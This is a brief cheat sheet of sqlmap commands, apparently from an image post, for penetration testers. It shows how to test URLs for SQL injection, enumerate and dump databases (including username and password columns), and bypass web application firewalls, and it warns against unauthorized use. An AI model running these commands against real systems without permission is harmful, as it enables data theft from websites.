SQL map commands

 This image explains basic Sql map commands.

•SQLMap is an open-source penetration testing tool used by ethical hackers and security testers to check websites or applications for SQL injection vulnerabilities.

◼️ sqlmap -u URL → Test injection

•Checks if the given website URL is vulnerable to SQL injection.

◼️ sqlmap -u URL --dbs → List databases

•If the site is vulnerable, this lists all databases available on the server.

◼️ sqlmap -u URL -D DB --tables → Show tables

•Shows all tables inside a specific database (DB).

◼️ sqlmap -u URL -D DB -T TABLE --columns → Show columns

•Displays all column names from a specific table in the database.

◼️ sqlmap -u URL -D DB -T TABLE --dump → Dump all data

•Extracts all data (rows) from the selected table.

◼️ sqlmap -u URL -D DB -T TABLE -C col1,col2 --dump → Dump specific columns

•Extracts only selected columns (e.g., usernames, passwords) instead of the whole table.

◼️ sqlmap -u URL --data "param=value" → POST injection test

•Tests SQL injection on sites that use POST requests (like login forms).

◼️ sqlmap -u URL --banner → Show DB version

•Reveals the database system and its version (e.g., MySQL 8.0).

◼️ sqlmap -u URL --tamper=script → WAF bypass

•Bypasses Web Application Firewalls (WAF) using special scripts.

◼️ sqlmap -u URL -o --output-dir=folder/ → Save results

•Saves all SQLMap findings in a specific folder for later review.

✓ Purpose:

These commands are mainly used by security professionals, penetration testers, and ethical hackers to test if a system is secure.

× Note: 

Unauthorized use of SQLMap on websites without permission is illegal. It should only be used for educational purposes or on systems you own / have permission to test.